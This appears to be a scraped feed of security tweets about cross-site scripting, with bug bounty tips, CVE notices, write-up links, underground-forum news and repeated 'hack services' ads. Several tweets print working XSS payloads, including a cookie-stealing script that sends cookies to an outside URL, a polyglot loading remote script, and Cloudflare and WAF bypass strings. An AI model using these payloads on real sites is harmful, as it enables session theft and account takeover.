![profile](https://pbs.twimg.com/profile_images/1607516814069698562/t6lLZs90_normal.jpg)
The XSS Rat - 🇺🇦
@theXSSrata year agoStay up-to-date with the latest #cybersecurity news! Our Python script scrapes the latest articles from multiple websites and outputs them to an HTML file. Check it out on GitHub: https://t.co/6SRT0miKUd #infosec #python
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoDOM Based XSS and Adding HTML Elements - Visit https://t.co/wa95mCIYvK for the solution. #xss #javascript #jquery #infosec #engineering
![profile](https://pbs.twimg.com/profile_images/1539876405231632384/3rdtEtLj_normal.jpg)
Red Hot Cyber
@redhotcybera year agoIn vendita i dati dell’italiana Alpi Aviation sul forum underground XSS #redhotcyber #informationsecurity #ethicalhacking #dataprotection #hacking #cybersecurity #cybercrime #cybersecuritytraining #cybersecuritynews #privacy #infosecurity https://t.co/0xIeBfC441
![profile](https://pbs.twimg.com/profile_images/1634259331003871233/l8MA2XPr_normal.jpg)
Saitle OP
@SaitleOa year agoFound an XSS without much impact, cmon escalate it heres a resource to help you https://t.co/KAoFXcFOCi #bugbountytips #redteaming #Pentesting
![profile](https://pbs.twimg.com/profile_images/1292087396972900357/pm1H2nwZ_normal.jpg)
Jeetendra Joshi
@SH3lLH4CK3Ra year ago@xer0dayz Is it possible to get RCE or SQL Injection using angular template injection like {{7*7}} ???? #bugbountytips #xss #sqli #hacker #BugBounty
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover) 👨💻 @bxmbn ➟ Expedia Group Bug Bounty 🟥 High 💰 $750.0 https://t.co/ByN8bqdun6 #bugbounty #bugbountytips #cybersecurity https://t.co/DYYmnooTK7
![profile](https://pbs.twimg.com/profile_images/1448391370419310592/yUpmTDis_normal.jpg)
yappare
@yapparea year agoWhen looking for bypass techniques in XSS/SQLi, my main reference is always https://t.co/6Oz09YCylo and https://t.co/86avErGjVn forums. But both are no longer accessible, but thanks to the Wayback machine. Here's an example https://t.co/ZVfEjX1EaJ . #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoXSS Hunter #BugBounty #bugbountytips https://t.co/Is0rjcj7XS
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@flightrising: ⚠️Summary: Emergency Maintenance ⚠️ On the #FlightRising website, we have posted our final update and summary on the attempted XSS attack on Friday, March 31, 2023. (1/2) #NotAprilFools #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoXSS polyglot ⚡️ '"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT> #infosec
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1704): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/rplNwVt7OG Disclosed by https://t.co/5npLBWBmoO, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1703): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/DgUYi0RXth Disclosed by https://t.co/5npLBWBmoO, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1702): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/9whdkTz8ni Disclosed by https://t.co/eC26LfjqRN, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1701): Cross-site Scripting (XSS) - Reflected in pimcore/pimcore. https://t.co/AvZZTzbxwk Disclosed by https://t.co/eC26LfjqRN, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoSuper FabriXss: From XSS to an RCE in Azure Service Fabric Explorer by #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoXSS Filter Evasion Cheat Sheet #BugBounty #bugbountytips https://t.co/YOgJQWBy0C
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoInstead of using : → javascript:alert(document.cookie) The best choice is : → data:text/html;base64,PHNjcmlwdDShbGVydCgnWENTJyk8L3NjcmiwdD4= #xss #hackerone #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoInstead of using : → <img src=x onerror=alert(1);> The best choice is : → <svg/onload=alert(1)> → <video src=x onerror=alert(1);> → <audio src=x onerror=alert(1);> #hackerone #XSS #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoInstead of using : → alert(document.cookie) The best choice is : → with(document)alert(cookie) → alert(document['cookie']) → alert(document[/cookie/.source]) → alert (document[/coo/.source+/kie/.source]) #XSS #hackerone #bugbountytips #BugBounty
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoCross-Site Scripting Instead of using : → alert('xss') → alert(1) The best choice is : → prompt('xss') → prompt(8) → confirm('xss') → confrim(8) → alert(/xss/.source) → window[/alert/.source](8) #xss #BugBounty #bugbountytips #hackerone
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoUber Bug Bounty: Turning Self-XSS into Good-XSS #bugbountytips #bugbounty https://t.co/SY5DuDdIDt
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year ago[webapps] Reprise Software RLM v14.2BL4 – Cross-Site Scripting (XSS) #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year ago[webapps] ELSI Smart Floor V3.3.3 – Stored Cross-Site Scripting (XSS) #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1247156745975160832/brE_ipvp_normal.jpg)
twelvesec
@twelveseca year ago#Microsoft #patches a dangerous #RCE flaw found in the #Azure cloud service. #CyberSecurity #infosec https://t.co/B78iC6Ly6E https://t.co/AYXrcAxtJG
![profile](https://pbs.twimg.com/profile_images/1613784461208064000/-428GwOS_normal.jpg)
Dheeraj Yadav
@Dheerajydv19a year agoWays for Hacking Admin Panels #bugbountytips 1. Accessing admin panels using Github 2. Accessing admin panels using blind xss 3. Accessing admin panels using open ports 4. Accessing admin panels using forced browsing 5. Accessing admin panels by reading sources(JS)
![profile](https://pbs.twimg.com/profile_images/1434211180965347329/zxgxkrpz_normal.jpg)
Rachit
@iamR3KTa year agoOne of my p2 XSS got duplicated and original report was submitted just 30 mins back.😭 #pain in life #bugbounty #journey #cybersecurity #Hacking https://t.co/BSnI2B3CF3
![profile](https://pbs.twimg.com/profile_images/1642075745681014784/fb_n8jxa_normal.jpg)
Faisal Rathore
@AkaaZaana year agoXSS payload to steal cookies ⚡️🍪 "><script>document.write(%27<img%20src="https://t.co/KeCpWdLpzp…"%20/>%27);</script> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1637174174652440576/Y5Q0b52n_normal.jpg)
SecurCrew
@SecurCrewa year agoCVE-2022-47438 (booking_calendar) Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in WpDevArt Booking calendar, Appointment Booking System plug ... https://t.co/4Xu5UjWDKB #SecurCrew #infosec #BugBounty #CyberSecurity #OSINT
![profile](https://pbs.twimg.com/profile_images/1637174174652440576/Y5Q0b52n_normal.jpg)
SecurCrew
@SecurCrewa year agoCVE-2022-47596 (media_library_categories) Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Jeffrey-WP Media Library Categories plugin &lt;= 1.9.9 vers ... https://t.co/WchwECqsut #SecurCrew #infosec #BugBounty #CyberSecurity #OSINT
![profile](https://pbs.twimg.com/profile_images/1637174174652440576/Y5Q0b52n_normal.jpg)
SecurCrew
@SecurCrewa year agoCVE-2022-47444 (profilepress) Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, ... https://t.co/YPdpMd9P6Z #SecurCrew #infosec #BugBounty #CyberSecurity #OSINT
![profile](https://pbs.twimg.com/profile_images/1626268981274505218/1kaj8Ypc_normal.jpg)
Cyber Wiki
@theCyberWikia year agoIntroduction to Hacking, Hacker and Hacker Classes https://t.co/ABMu5pf9bE #CyberWiki #HackHunt #Hack #Hacker #Hacking #EthicalHacking #Network #EthicalHacker #Cybersecure #Cybersecurity #Vulnerable #Software #Pentesting #XSS #VAPT #Audit #Forensics #Coding #BugHunting https://t.co/xWZhXI4UbC
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoWAF Bypass XSS Payload in JSON:📷 ["');alert('CYBERTIX');//"] #XSS #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1641763380531978241/h5a1qE9r_normal.jpg)
Vishal Vishwakarma
@rootxvishala year agoWAF Bypass XSS Payload in JSON:⚙️ ["');alert('CYBERTIX');//"] #XSS #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1641763380531978241/h5a1qE9r_normal.jpg)
Vishal Vishwakarma
@rootxvishala year agoCloudflare XSS Bypass ⚠️ <svg/onload=location/**/='https://t.co/9J76uAEMi3…> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudfIare XSS 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱:⚙️ <select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoWAF Bypass XSS Payload in JSON:⚙️ ["');alert('CYBERTIX');//"] #XSS #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoStored XSS Payload⚡️ <abdool attr=" --- x="=='='onmouseover=confirm`abdool` style="display:block;width:1000px;height:1000px;background:red"> --- "> #infosec #bugbountytips #cybersecuritytips
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year ago0x0SojalSec discovered a #vulnerability that could allow attackers to bypass XSS protections from Cloudflare. 🔍 Read more about this security flaw here: https://t.co/7RcQ8izV7X. 🛡️ Stay safe & secure with #Infosec & #bugbountytips. 🔐 #Cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoXSS payload to steal cookies ⚡️🍪 "><script>document.write(%27<img%20src="https://t.co/Y4b5kr8aSN"%20/>%27);</script> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudflare XSS Bypass ⚠️ <svg/onload=location/**/='https://t.co/JjpSb9H5fd> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoXSS polyglot ⚡️ '"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT> #infosec
![profile](https://pbs.twimg.com/profile_images/1219143153871020032/3tvm-Zt7_normal.jpg)
Sathish M
@goldenrockers1a year ago@NinadMishra5 @terjanq @SaveToBookmarks #XSS #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1622271479542075392/ddDAE9uH_normal.jpg)
mann
@maxx_191a year agoXSScrapy- Automated XSS Finder - Tool to automate XSS discovery with extra features to find XSS, SQL https://t.co/gHAUdM0meF #bugbountytips #infosec #xss #bugbounty
![profile](https://pbs.twimg.com/profile_images/938049153585860608/zQUSrn9H_normal.jpg)
ACCEIS
@acceisa year agoSolution for the vulnerable code snippet n°2 🛠️ See the write-up article: https://t.co/YK9lkIgAGG Vuln : XSS 🪲 Language : Ruby 💎 Fixed code below: #codereview #vulnerablecode #codesnippet #brokencode #appsec #infosec #pentesting #securityexplained https://t.co/3FwmVtUnx8
![profile](https://pbs.twimg.com/profile_images/938049153585860608/zQUSrn9H_normal.jpg)
ACCEIS
@acceisa year agoSolution de l'extrait de code vulnérable n°2 🛠️ Voir l'article détaillé : https://t.co/fRVVRtWV2Z Vuln : XSS 🪲 Langage : Ruby 💎 Code corrigé ci-dessous : #codereview #vulnerablecode #codesnippet #brokencode #appsec #infosec #pentesting #securityexplained https://t.co/TZ81lKNs9L
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1067): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/ykKOFWRVCD Disclosed by https://t.co/JGbdQ993Su, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1536825710530203649/8DJczDdG_normal.png)
Security Pills
@secpillsnewsa year ago🌩 Microsoft Azure Account Takeover @creastery explains how a mistake in a ReGex could be exploited by attackers to steal a user's Azure session and gain access other cloud resources. #appsec #bugbounty https://t.co/uFRpk2dSij https://t.co/zY6fLifWk7
![profile](https://pbs.twimg.com/profile_images/1630948684958408704/oq3k4FU6_normal.jpg)
elsec
@adrielseca year agotip: swagger never disappoints! 👀 XSS at Shopify https://t.co/uNmUlT70PW #bugbountytips #bugbounty #infosec #seginfo #hacking #hackerone
![profile](https://pbs.twimg.com/profile_images/1627558481975803904/7LeBxf9M_normal.jpg)
Ahmed Kamal Abu_Elwafa
@AhmedKa01184061a year agoI just published a new Write-up on medium : How I Was able to find 2 Stored XSS via SVG file Upload https://t.co/7SnZuBx4Wx #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoInteresting Stored XSS in sandboxed environment to Full Account Takeover https://t.co/u6w4j4jgZQ #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1386359003031261192/0hg0RNma_normal.png)
OpsMatters
@opsmatters_uka year agoThe latest update for #Indusface includes "What is Cross-Site Scripting (XSS)? Types of XSS, Examples, and Patching Best Practices" and "How to Prevent SQL Injection Attacks?". #cybersecurity #infosec https://t.co/DmQDQErqjL
![profile](https://pbs.twimg.com/profile_images/1583097371050708992/Q1Ofhd9j_normal.jpg)
Rui Shang
@RuiShang9a year ago#bugbountytips #BugBounty Server-Side MIME Sniff resulting from Go language project containerization https://t.co/DfF0mr6kCp
![profile](https://pbs.twimg.com/profile_images/669268065507373056/7fTno46I_normal.png)
Jesse Clark
@Hogarth45_a year ago@mongobug Gotta keep the impact above 22 if you want an invite to an event. Why report an xss for $250 and miss out on an event to get $20k+ https://t.co/1smezAKjk1
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Bugbountytips, Xss]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@fattselimi @TopengaNFT @TomNomNom @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1406662913637732354/59r07pmT_normal.jpg)
Nish Vamadevan
@nisha year agoI am seeing a lot of Cross-site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilites popping up lately. #cybersecurity #infosec #Vulnerabilities #Threat #Attack #XSS #CSRF
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoWhat is the benefit of the X-XSS-Protection: 0 header in a production environment? - Visit https://t.co/42Eaw9sIBR for the answer. #xss #infosec #coder #developer #software
![profile](https://pbs.twimg.com/profile_images/1629129999411191815/TlOdkiol_normal.jpg)
drak3hft7
@drak3hft7a year agoHi @yeswehack everything okay? if the vuln is of medium severity, the program exposes that it pays up to 500 euros for the averages. Why is a Reflected XSS only paid 250? not a very nice thing for us bug hunters. #BugBounty #YesWeRHackers
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoGoogle Dork list for XSS https://t.co/cfsRfahf6C #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year ago7h3h4ckv157 👩💻 Check out this awesome blog post by 7h3h4ckv157 to learn how to bypass Cloudflare and exploit XSS vulnerabilities. 🤩 Get the step-by-step instructions here: https://t.co/mWhfpuIdJT #infosec #bugbountytips #BugBounty
![profile](https://pbs.twimg.com/profile_images/1630136629523517441/a-9XwJvL_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoCloudflare bypass and exploit your xss https://t.co/rnvF60AivR #infosec #bugbountytips #BugBounty
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/mMMDrt5dEK
![profile](https://pbs.twimg.com/profile_images/1626618299491688448/8Uda91tW_normal.jpg)
Rajneesh Gupta | Cybersecurity Coach
@_RajneeshGuptaa year ago🔺 Top 5 Web Application Vulnerabilities 1. Cross-site Scripting(XSS) 2. Broken Authentication 3. SQL Injection 4. Cross-Site Request Forgery(CSRF) 5. Insecure Direct Object Reference #hacking #cybersecurityt
![profile](https://pbs.twimg.com/profile_images/931552541074128896/DEimVzqz_normal.jpg)
The Daily Swig
@DailySwiga year agoThis month’s #BugBountyRadar: Fresh targets from Grindr and Miro, infosec drama with XSS Hunter’s new host, and Belgium rolls out the red carpet for ethical hackers https://t.co/9zOiONeuGu
![profile](https://pbs.twimg.com/profile_images/1406662913637732354/59r07pmT_normal.jpg)
Nish Vamadevan
@nisha year agoPatch your Aruba Devices. A vulnerability in the ArubaOS web management interface could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. https://t.co/bwf0D8qkFp #cybersecurity #infosec #aruba
![profile](https://pbs.twimg.com/profile_images/1408753006477185030/_7Q1eRbL_normal.jpg)
ether_dz
@BELKHIRIKhired1a year agoso what do you think it's an ssrf or xss ? #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1528690038527119362/e5qXzKMq_normal.jpg)
Drocapy
@azam_gassima year agoagain xss 🔥 tipe: try to understand the site how it works through analyzing the features and internal functions site via view-source . Note: If we are talking about speed and performance in work @Bugcrowd Triaged & customer team is the best 🚀 #bugbountytips #BugBounty https://t.co/IzFt44872q
![profile](https://pbs.twimg.com/profile_images/1630647787837587462/N5C6BHCA_normal.jpg)
Who Am I ?
@19Who_Am_I19a year agoReflected XSS in 2 mins , u have to check the hidden parameters its a hidden gems " WHO AM I ? " #bugbounty #bugbountytips #bughunting #hackerone #bugcrowd https://t.co/G2W2LudwWu
![profile](https://pbs.twimg.com/profile_images/1573053235417473040/O7J15mS5_normal.jpg)
LinuxSecurity
@LS_Advisoriesa year agoUbuntu 58991: AWStats vulnerability - AWStats could allow crosssite scripting (XSS) attacks. Ubuntu Security Notice USN58991 February 28, 2023 awstats vulnerabili... @lnxsec #Ubuntu #Linux #infosec #opensource #linuxsecurity https://t.co/ClnvcyBT5Z https://t.co/WBzHcdzudG
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoInteresting Stored XSS in sandboxed environment to Full Account Takeover by: varmaanu001 https://t.co/7X3zjexTgn #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/ChABNlvuGF
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/hprxRy4jiq
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBlind XSS fired on Admin panel worth $2000 https://t.co/YLXcpXrryQ #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1266895467700531203/Qa3BBoML_normal.png)
ㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤㅤㅤㅤㅤ sudo rm -rf /*
@ApostolWarioa year agohttps://t.co/mH9fFH0fJq - RT @InfoSecComm: 48th edition of IWWeekly is live 🔥 In this week's newsletter learn about: 1. Slack Vulnerability 2. DOM-XSS on Microsoft 3. GraphQL Hacking 4. Hacking AWS Cloud 5. XSS Guide Read here: https://t.co/rmk18FBTko #earmas
![profile](https://pbs.twimg.com/profile_images/1477721559020322817/IPj-2k5W_normal.jpg)
Osama Avvan
@osamaavvana year agoHello, Another Interesting XSS challenge, DOM Clobbering to XSS. In collaboration with @hamzaavvan https://t.co/cbUXZfOKke #xss #BugBounty #challenge
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCRsO… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/sYWU098Kco
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoGoogle Dork list for XSS by: anoint https://t.co/vSTj8hJa07 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1453300783546576912/8Omwr9fa_normal.jpg)
Cyber Fusion Team
@SecAlliancea year agoOn 25 February 2023, a user on underground hacking forum XSS created a post advertising the sale of email access into the French Ministry of the Armed Forces and Brazilian Public Defenders Office (DPU).
![profile](https://pbs.twimg.com/profile_images/1266895467700531203/Qa3BBoML_normal.png)
ㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤㅤㅤㅤㅤ sudo rm -rf /*
@ApostolWarioa year agohttps://t.co/mH9fFH0fJq - 48th edition of IWWeekly is live 🔥 In this week's newsletter learn about: 1. Slack Vulnerability 2. DOM-XSS on Microsoft 3. GraphQL Hacking 4. Hacking AWS Cloud 5. XSS Guide Read here: https://t.co/rmk18FBTko #earmas
![profile](https://pbs.twimg.com/profile_images/1000400570761396224/zSfCs2uU_normal.jpg)
InfoSec Community
@InfoSecComma year ago48th edition of IWWeekly is live 🔥 In this week's newsletter learn about: 1. Slack Vulnerability 2. DOM-XSS on Microsoft 3. GraphQL Hacking 4. Hacking AWS Cloud 5. XSS Guide Read here: https://t.co/B4RqgobE2a
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO
@hacklidoa year ago💠 Blue Team Bootcamp Series (P3): How to Detect Cross-Site Scripting (XSS) Attacks By @LE0_Hak #cybersecurity #infosec #xss #bugbounty #bugbountytips #pentesting #web https://t.co/wJGSQrvnQ4
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/oFkI41GbFW
![profile](https://pbs.twimg.com/profile_images/1575494481775759360/b9y0iB3S_normal.jpg)
Hackerinthehouse
@hackerinhousea year agoBuilding an XSS Scanner with Python https://t.co/pyl341gapt #bugbounty #bugbountytips #cybersecurity #xss
![profile](https://pbs.twimg.com/profile_images/1369764815003136007/DX3xE5wp_normal.jpg)
khalil shreateh 🧢
@Shreateha year agohttps://t.co/rQjN3k80aL #shreateh #exploit #hacker #computer #cybersecurity #blackleaders #technology #vulnerability #vulnerabilityisstrength #vulnerable #infosec #security #tech #hacking #programming #hackers #coding #safety #cybersec
![profile](https://pbs.twimg.com/profile_images/1629446960997605377/vlE6XwJF_normal.jpg)
KRIPT099
@KRIPT099a year agoBuilding XSS Scanner Using Python 👇 https://t.co/chGTxtfaiZ #bugbounty #bugbountytips #cybersecurity #infosec #xss #xssscanner
![profile](https://pbs.twimg.com/profile_images/1627584048884490240/COXWsJSV_normal.jpg)
Saif abdullah khan🇧🇩
@0xmahia year agoxss via jwt= 1. Make a jwt token and insert a xss paylaod. 2. The final url is like url/dest?jwt=vulnerable-jwt-token. (jwt= paramter was decoding the provided jwt token and show's it into the page). @TopengaNFT Thanks my frnd 🔥 #BugBounty #bugbountytips https://t.co/AbkzeQ517i
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0995): Cross-site Scripting (XSS) - Stored in unilogies/bumsys. https://t.co/4cYB9DWrqU Disclosed by https://t.co/PLCH1wNNXA, fixed by unilogies maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@solminingpunk: Never forget the XSS attack on Flux(.)tech 😜 https://t.co/P9fXoH9SUU #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1477721559020322817/IPj-2k5W_normal.jpg)
Osama Avvan
@osamaavvana year agoHi folks, Back with another XSS challenge. Just a regular XSS, try to get a pop-up. https://xss-heaven(.)000webhostapp(.)com/xss.php Note: Remove the Brackets from URL Dm your solutions. #cyberseurity #xss #BugBounty
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ [XSS] Reflected XSS via POST request 👨💻 @0xd3adcode ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/g7WfEIBzmd #bugbounty #bugbountytips #cybersecurity https://t.co/fR0I64irIH
![profile](https://pbs.twimg.com/profile_images/1504688064027041794/DY3bxBcU_normal.jpg)
Dev
